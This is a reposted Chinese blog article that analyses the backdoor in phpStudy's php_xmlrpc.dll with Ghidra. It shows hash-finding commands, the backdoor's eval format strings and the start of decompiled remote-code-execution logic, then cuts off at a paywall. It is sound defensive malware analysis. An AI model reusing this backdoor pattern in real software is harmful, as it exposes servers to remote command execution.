使用 Ghidra 分析 phpStudy 后门

最新推荐文章于 2024-05-13 07:19:51 发布
最新推荐文章于 2024-05-13 07:19:51 发布
阅读量2.9k 收藏 1
点赞数
分类专栏: 网络安全 文章标签: 工具 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44058342/article/details/102681920
版权
本文详细介绍了如何使用 Ghidra 分析 phpStudy 20180211 版本中的后门。作者首先介绍了分析环境和主要工具,接着在 Kali Linux 中载入样本,通过 Ghidra 搜索和定位到包含 'eval' 关键字的代码段。通过逆向工程,揭示了三个后门的详细执行流程,包括远程代码执行的实现细节和解码过程。
摘要由CSDN通过智能技术生成

作者:lu4nx@知道创宇404积极防御实验室

作者博客:《使用 Ghidra 分析 phpStudy 后门》

原文链接:https://paper.seebug.org/1058/

 

这次事件已过去数日,该响应的也都响应了,虽然网上有很多厂商及组织发表了分析文章,但记载分析过程的不多,我只是想正儿八经用 Ghidra 从头到尾分析下。

1 工具和平台

主要工具:

  • Kali Linux
  • Ghidra 9.0.4
  • 010Editor 9.0.2

样本环境:

  • Windows7
  • phpStudy 20180211

2 分析过程

先在 Windows 7 虚拟机中安装 PhpStudy 20180211,然后把安装完后的目录拷贝到 Kali Linux 中。

根据网上公开的信息:后门存在于 php_xmlrpc.dll 文件中,里面存在“eval”关键字,文件 MD5 为 c339482fd2b233fb0a555b629c0ea5d5。

因此,先去找到有后门的文件:

lu4nx@lx-kali:/tmp/phpStudy$ find ./ -name php_xmlrpc.dll -exec md5sum {} \;
3d2c61ed73e9bb300b52a0555135f2f7  ./PHPTutorial/php/php-7.2.1-nts/ext/php_xmlrpc.dll
7c24d796e0ae34e665adcc6a1643e132  ./PHPTutorial/php/php-7.1.13-nts/ext/php_xmlrpc.dll
3ff4ac19000e141fef07b0af5c36a5a3  ./PHPTutorial/php/php-5.4.45-nts/ext/php_xmlrpc.dll
c339482fd2b233fb0a555b629c0ea5d5  ./PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll
5db2d02c6847f4b7e8b4c93b16bc8841  ./PHPTutorial/php/php-7.0.12-nts/ext/php_xmlrpc.dll
42701103137121d2a2afa7349c233437  ./PHPTutorial/php/php-5.3.29-nts/ext/php_xmlrpc.dll
0f7ad38e7a9857523dfbce4bce43a9e9  ./PHPTutorial/php/php-5.2.17/ext/php_xmlrpc.dll
149c62e8c2a1732f9f078a7d17baed00  ./PHPTutorial/php/php-5.5.38/ext/php_xmlrpc.dll
fc118f661b45195afa02cbf9d2e57754  ./PHPTutorial/php/php-5.6.27-nts/ext/php_xmlrpc.dll

将文件 ./PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll 单独拷贝出来,再确认下是否存在后门:

lu4nx@lx-kali:/tmp/phpStudy$ strings ./PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll | grep eval
zend_eval_string
@eval(%s('%s'));
%s;@eval(%s('%s'));

从上面的搜索结果可以看到文件中存在三个“eval”关键字,现在用 Ghidra 载入分析。

在 Ghidra 中搜索下:菜单栏“Search” > “For Strings”,弹出的菜单按“Search”,然后在结果过滤窗口中过滤“eval”字符串,如图:

从上方结果“Code”字段看的出这三个关键字都位于文件 Data 段中。随便选中一个(我选的“@eval(%s(‘%s’));”)并双击,跳转到地址中,然后查看哪些地方引用过这个字符串(右击,References > Show References to Address),操作如图:

结果如下:

可看到这段数据在 PUSH 指令中被使用,应该是函数调用,双击跳转到汇编指令处,然后 Ghidra 会自动把汇编代码转成较高级的伪代码并呈现在 Decompile 窗口中:

如果没有看到 Decompile 窗口,在菜单Window > Decompile 中打开。

在翻译后的函数 FUN_100031f0 中,我找到了前面搜索到的三个 eval 字符,说明这个函数中可能存在多个后门(当然经过完整分析后存在三个后门)。

这里插一句,Ghidra 转换高级代码能力比 IDA 的 Hex-Rays Decompiler 插件要差一些,比如 Ghidra 转换的这段代码:

puVar8 = local_19f;
while (iVar5 != 0) {
  iVar5 = iVar5 + -1;
  *puVar8 = 0;
  puVar8 = puVar8 + 1;
}

在IDA中翻译得就很直观:

memset(&v27, 0, 0xB0u);

还有对多个逻辑的判断,IDA 翻译出来是:

if (a && b){
...
}

Ghidra 翻译出来却是:

if (a) {
  if(b) {
  }
}

而多层 if 嵌套阅读起来会经常迷路。总之 Ghidra 翻译的代码只有反复阅读后才知道是干嘛的,在理解这类代码上我花了好几个小时。

2.1 第一个远程代码执行的后门

第一个后门存在于这段代码:

iVar5 = zend_hash_find(*(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4) + 0xd8,
                       s__SERVER_1000ec9c,~uVar6,&local_14);
if (iVar5 != -1) {
  uVar6 = 0xffffffff;
  pcVar9 = s_HTTP_ACCEPT_ENCODING_1000ec84;
  do {
    if (uVar6 == 0) break;
    uVar6 =
最低0.47元/天 解锁文章
晓得哥
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用ghidra进行逆向工程静态分析
shutdown -s -t
10-03 1937
Ghidra是一个软件逆向工程(SRE)框架,包括一套功能齐全的高端软件分析工具使用户能够在各种平台上分析编译后的代码,包括Windows、Mac OS和Linux。功能包括反汇编,汇编,反编译,绘图和脚本,以及数百个其他功能。Ghidra支持各种处理器指令集和可执行格式,可以在用户交互模式和自动模式下运行。用户还可以使用公开的API开发自己的Ghidra插件和脚本。 下载安装 官方网站是https://ghidra-sre.org/,似乎直接访问不到。 项目部分内容开源在https://github.c
ghidra
最新发布
yeshen.org
06-09 410
ghidra使用方法
# 逆向神器:Ghidra简介及使用方法
2401_84967873的博客
05-13 426
【代码】# 逆向神器:Ghidra简介及使用方法。
windows上安装ghidra_9.0.4与对应的jdk
CSDN__LiMing的博客
10-13 1052
下载好了之后直接解压,ghidra工具是解压即安装的解压完了后就可去弄jdk了,jdk解压后安装到指定地点,然后配置环境变量,注意如果你之前电脑上有配置过环境变量并且jdk的版本低于11那么你就可以不用更改环境变量,直接去启动ghidra,进入解压好的文件夹,双击ghidraRun.bat文件,然后因为你的jdk版本过低他会让你去选择jdk,这是我们选择刚刚安装好的jdk就行了;链接:https://pan.baidu.com/s/1oN_azSm9GyMITOf1B_yDQw。
出现身份验证错误 要求的函数不受支持_对两个DLink路由器身份验证绕过漏洞的分析...
weixin_39854681的博客
12-08 277
今年2月,D-Link发布了 针对两个身份验证绕过漏洞CVE-2020-8863 和 CVE-2020-8864的固件 补丁程序,这些漏洞 影响了D-Link DIR-882,DIR-878和DIR-867路由器。这些漏洞存在于HNAP协议的处理中。https://supportannouncement.us.dlink.com/announcement/publication.aspx...
Ghidra逆向分析工具使用与实战
Ba1_Ma0的博客
05-03 9192
简介 Ghidra 是由美国国家安全局研究局创建和维护的软件逆向工程 (SRE) 框架 。该框架包括一套功能齐全的高端软件分析工具使用户能够在包括 Windows、macOS 和 Linux 在内的各种平台上分析编译代码。功能包括反汇编、汇编、反编译、绘图和脚本,以及数百个其他功能。Ghidra 支持多种处理器指令集和可执行格式,并且可以在用户交互和自动化模式下运行。用户还可以使用 Java 或 Python 开发自己的 Ghidra 扩展组件和/或脚本。 下载地址: https://github.com
Ghidra 9.0.2
04-09
4. **脚本语言支持**:Ghidra 支持使用Python和Java编写脚本,用户可以利用这些脚本自动化分析过程,实现定制化的分析任务。 5. **函数分析**:Ghidra 的函数分析工具可以识别函数边界,分析调用关系,甚至推测未...
ghidra 安装包
03-08
安装包文件名: ghidra_9.0_PUBLIC_20190228.zip SHA: 3b65d29024b9decdbb1148b12fe87bcb7f3a6a56ff38475f5dc9dd1cfc7fd6b2 官网: http://ghidra-sre.org/ (需要翻) 其它网友脱下来的安装说明 英文: ...
JNIAnalyzer:Ghidra分析脚本可与Android NDK库一起使用
05-04
JNI分析仪此Ghidra扩展包含各种脚本,可帮助分析Android NDK应用程序。 该插件的二进制忍者版本也如何安装扩展克隆此存储库( git clone https://github.com/Ayrx/JNIAnalyzer.git ) 在克隆的存储库文件夹中,使用...
efiSeek:用于UEFI固件的Ghidra分析
05-06
分析仪使研究EFI文件的过程自动化,有助于发现和分析众所周知的协议,smi处理程序等。 特征 查找已知的EFI GUID 标识使用LOCATE_PROTOCOL函数定位的协议 标识用作NOTIFY函数的函数 标识通过INSTALL_PROTOCOL_...
ghidra-firmware-utils:Ghidra实用程序,用于分析PC固件
05-14
Ghidra固件实用程序 各种模块可协助PC固件反向工程。 这被接受的。 特征 PCI选件ROM加载器 为PCI选项ROM实现FS加载器(处理具有多个映像的混合ROM,例如旧版x86 + UEFI) 从PCI选件ROM加载UEFI可执行文件(包括压缩...
ghidra_9.0使用入门
Peanuts
03-07 7123
ghidra_9.0使用入门 昨天就听说NSA公开了这套工具,通过朋友下载使用了一下,感觉还行其实一些功能和ida差不多。这里写个简单的入门使用教程,这工具
恶意软件逆向工程:Ghidra 入门 -第三部分-分析 WannaCry 勒索软件
YJ_12340的博客
04-19 1421
逆向工程是最受欢迎和最有价值的网络安全/信息安全技能之一。但很少有人能将自己的技能水平发展到精通这一备受追捧的技能。Ghidra是美国间谍机构NSA提供的一种相对较新且免费的逆向工程工具。WannaCry。它感染了全球30多万台电脑,如果不是马库斯-赫钦斯(Marcus Hutchens,又名MalwareTech)的工作和技能,可能会造成巨大的破坏。获得了该恶意软件的样本,并立即开始检查其代码。在其中,他发现了通常被称为killswitch的东西。
Mac 下安装使用Ghidra
weixin_34071713的博客
04-18 1495
安装 据说是ida的开源替代品,并且是免费开源的。所以从看雪论坛上看到这个东西后就下载尝试了一下,看雪地址 这玩意国内好像不能下载,至于为啥。。。~~~ GitHub源码地址 这个东西没有什么好安装的,下载下来解包后可以直接命令行运行就行: ghidra_9.0 ├── Extensions ├── GPL ├── Ghidra ├── LICENSE.txt ├── docs ├── ghi...
Linux环境编译安装Ghidra教程
一个记录空间
05-29 6311
1、前言 Ghidra是由美国国家安全局(NSA)研究部门开发的软件逆向工程(software reverse engineering,SRE)套件,用于支持网络安全任务,此软件目前已经开源,对比IDA,Ghidra有着一定的优势。 笔者前段时间研究一道加花处理的逆向CTF题目,发现此题用Ghidra进行分析可直接无视花指令问题,遂对Ghidra产生一定兴趣,由于笔者之前安装的是windows环境下的Ghidra(因为没找到Linux版的Ghidra),所以现在想试着编译安装一个Linux环境下的Ghidr
记录一次使用ghidra逆向分析斐讯K3官改固件web登录验证的经历
fjh1997的博客
03-05 2015
写在前面:逆向工程小白,仅供参考,如有错误,欢迎指正。 固件地址:https://www.right.com.cn/forum/thread-318971-1-1.html 备份:http://iytc.net/tools/k3c_v121_fs.bin 使用binwalk提取固件内的根文件系统: wget http://iytc.net/tools/k3c_v121_fs.bin binwalk -M -d -e k3c_v121_fs.bin #注意要加-M表示Recursively 递归提取,比较彻
学习笔记-Ghidra
人饭子的博客
11-02 1264
Ghidra 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 简介 Ghidra 是由美国国家安全局(NSA)研究部门开发的软件逆向工程(SRE)套件,用于支持网络安全任务。包括一套功能齐全的高端软件分析工具使用户能够在各种平台 (Windows、Mac OS 和 Linux) 分析编译后的代码。功能包括反汇编,汇编,反编译,绘...
nsa构架_我如何使用NSA的Ghidra解决了一个简单的CrackMe挑战
cumi7754的博客
08-04 501
nsa构架by Denis Nuțiu 丹尼斯·努尤(Denis Nuțiu) 我如何使用NSA的Ghidra解决了一个简单的CrackMe挑战 (How I solved a simple CrackMe challenge with the NSA’s Ghidra) Hello! 你好! I’ve been playing recently a bit with Ghidra, whi...
使用Ghidra破解注册程序,编写python注册码生成程序。
weixin_30332705的博客
04-20 367
Crackme(目标程序):https://crackmes.one/static/crackme/5c268e8333c5d41e58e00654.zip Ghidra(NSA反编译工具):https://github.com/NationalSecurityAgency/ghidra BlackArch(操作系统):https://blackarch.org/ Pycharm(pytho...
Ghidra逆向分析工具详解:从安装到反编译
Ghidra 10.1 逆向分析二进制程序 Ghidra 是一个由 NSA 研究理事会开发的软件逆向工程(SRE)框架,主要用于分析恶意代码和病毒...Ghidra 是一个功能强大且易于使用的逆向分析工具,非常适合网络安全专家和开发者使用
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值